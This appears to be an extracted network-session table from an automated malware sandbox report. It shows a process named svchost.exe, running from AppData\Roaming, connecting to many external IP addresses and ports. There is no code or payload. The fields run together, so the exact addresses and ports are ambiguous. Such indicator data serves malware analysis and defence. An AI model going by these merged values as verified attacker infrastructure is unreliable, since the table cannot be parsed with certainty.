                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4398192.168.2.56270372.195.114.169414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4399192.168.2.56364543.231.22.2298056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4400192.168.2.56342264.227.106.1578056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4401192.168.2.563684203.218.172.225808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4402192.168.2.562718201.91.82.155312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4403192.168.2.563410193.239.56.84808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4404192.168.2.563685150.109.243.1561567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4405192.168.2.562769138.68.155.221076056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4406192.168.2.563671116.199.168.1414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4407192.168.2.563659124.163.236.54730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4408192.168.2.563687115.96.208.124808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4409192.168.2.563703198.44.255.38056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4410192.168.2.56371241.111.243.188056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4411192.168.2.563704187.40.1.12312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4412192.168.2.563464107.180.88.415764256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4413192.168.2.56371551.210.223.9300056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4414192.168.2.563544107.181.168.145414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4415192.168.2.563634117.160.250.138889956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4416192.168.2.563699212.108.155.205909056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4417192.168.2.56279992.204.135.2031082456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4418192.168.2.56347280.63.84.58808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4419192.168.2.56371893.90.212.2415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4420192.168.2.56374351.15.223.241637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4421192.168.2.563520162.214.164.2004262456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4422192.168.2.5635065.161.231.348056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4423192.168.2.563766162.159.242.1588056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4424192.168.2.563719122.114.232.13780856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4425192.168.2.56349120.0.91.1508056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4426192.168.2.562901162.214.225.2233147356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4427192.168.2.563519202.61.204.518056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4428192.168.2.563783104.16.81.768056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4429192.168.2.56375547.56.110.204898956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4430192.168.2.563803172.67.35.158056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4431192.168.2.56376335.199.90.225888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4432192.168.2.56270789.145.162.81312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4433192.168.2.562873128.199.221.915810856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4434192.168.2.563572213.32.66.645016356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4435192.168.2.563801201.174.239.28415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4436192.168.2.563772185.49.30.5808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4437192.168.2.56357439.105.27.30312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4438192.168.2.5637758.217.143.1871567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4439192.168.2.56379547.243.114.192818056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4440192.168.2.563453198.8.84.3414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4441192.168.2.563785167.172.86.461047156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4442192.168.2.563797203.218.172.225808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4443192.168.2.5637908.219.228.1001567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4444192.168.2.56377389.218.8.152108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4445192.168.2.5639348.213.128.644356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4446192.168.2.5639368.213.128.644356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4447192.168.2.5639378.213.128.644356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4448192.168.2.5639398.213.128.644356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4449192.168.2.56381635.72.118.1268056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4450192.168.2.563804193.239.56.84808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4451192.168.2.563793138.36.150.15108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4452192.168.2.563820121.128.194.1548056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4453192.168.2.563867104.20.24.2148056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4454192.168.2.56230954.36.122.162979656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4455192.168.2.563887159.65.77.168858556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4456192.168.2.563874172.67.253.698056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4457192.168.2.563829198.44.255.38056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4458192.168.2.56382863.250.52.10108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4459192.168.2.563919104.21.102.958056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4460192.168.2.56383251.210.223.9300056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4461192.168.2.56362512.186.205.1228056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4462192.168.2.562318185.189.100.2001108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4463192.168.2.56382143.231.22.2298056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4464192.168.2.563818103.153.154.68056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4465192.168.2.56384284.39.112.144312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4466192.168.2.563945104.21.6.888056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4467192.168.2.563608128.199.196.313883256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4468192.168.2.563930162.214.225.2235075356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4469192.168.2.563903199.229.254.129414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4470192.168.2.563847210.4.194.1968056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4471192.168.2.5638638.218.231.621567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4472192.168.2.563975104.16.213.2028056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4473192.168.2.563976172.67.181.518056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4474192.168.2.563875211.222.252.1878056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4475192.168.2.56364451.15.139.151637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4476192.168.2.563831116.199.168.1414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4477192.168.2.56396235.209.198.2228056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4478192.168.2.563987199.102.104.70414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4479192.168.2.563897202.83.102.83808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4480192.168.2.563662209.14.112.2108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4481192.168.2.564021172.67.182.488056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4482192.168.2.56313351.79.87.1445439556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4483192.168.2.563923144.76.96.180556656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4484192.168.2.56303745.140.189.952900356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4485192.168.2.563958198.105.100.156640756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4486192.168.2.563997201.174.239.28415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4487192.168.2.564004129.213.150.205808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4488192.168.2.5639498.222.164.2051567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4489192.168.2.56392793.90.212.2415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4490192.168.2.56392543.128.107.251888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4491192.168.2.563985209.97.150.167312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4492192.168.2.563993162.159.247.578056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4493192.168.2.56397758.234.116.197819756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4494192.168.2.564006199.58.185.9414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4495192.168.2.564058104.16.109.2078056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4496192.168.2.564063104.25.114.288056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4497192.168.2.56366694.20.183.1728056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4498192.168.2.56393154.36.122.163971356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4499192.168.2.56399647.56.110.204898956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4500192.168.2.563033103.140.34.59808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4501192.168.2.5639415.32.88.130808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4502192.168.2.56316367.205.162.1031439856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4503192.168.2.563904119.39.68.105232356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4504192.168.2.564005190.110.226.1628056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4505192.168.2.56401631.28.4.1928056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4506192.168.2.564040185.220.226.23580856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4507192.168.2.563180138.68.155.224466056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4508192.168.2.56400947.100.236.23808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4509192.168.2.563234162.241.6.976065156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4510192.168.2.5640423.37.125.76312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4511192.168.2.56403358.20.248.139900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4512192.168.2.563240200.94.96.17499956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4513192.168.2.563127161.97.163.524506356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4514192.168.2.564078159.65.77.168858556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4515192.168.2.56412223.227.38.2308056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4516192.168.2.564161104.25.234.818056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4517192.168.2.564145147.124.212.313047956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4518192.168.2.564167104.20.103.688056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4519192.168.2.564198104.18.103.1258056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4520192.168.2.56410452.151.210.204900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4521192.168.2.564165204.236.176.618056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4522192.168.2.56407647.243.114.192818056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4523192.168.2.5640758.217.143.1871567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4524192.168.2.564216104.17.132.798056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4525192.168.2.563725125.99.106.250312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4526192.168.2.564109121.128.194.1548056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4527192.168.2.564119198.44.255.38056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4528192.168.2.56415744.190.9.654810056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4529192.168.2.56412751.15.212.2071637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4530192.168.2.564116203.218.172.225808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4531192.168.2.56361472.210.252.137414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4532192.168.2.563101117.160.250.1638156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4533192.168.2.56411443.133.70.571567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4534192.168.2.564106167.172.86.461047156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4535192.168.2.5641078.219.228.1001567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4536192.168.2.56414320.37.207.8808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4537192.168.2.56422251.222.241.83621943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


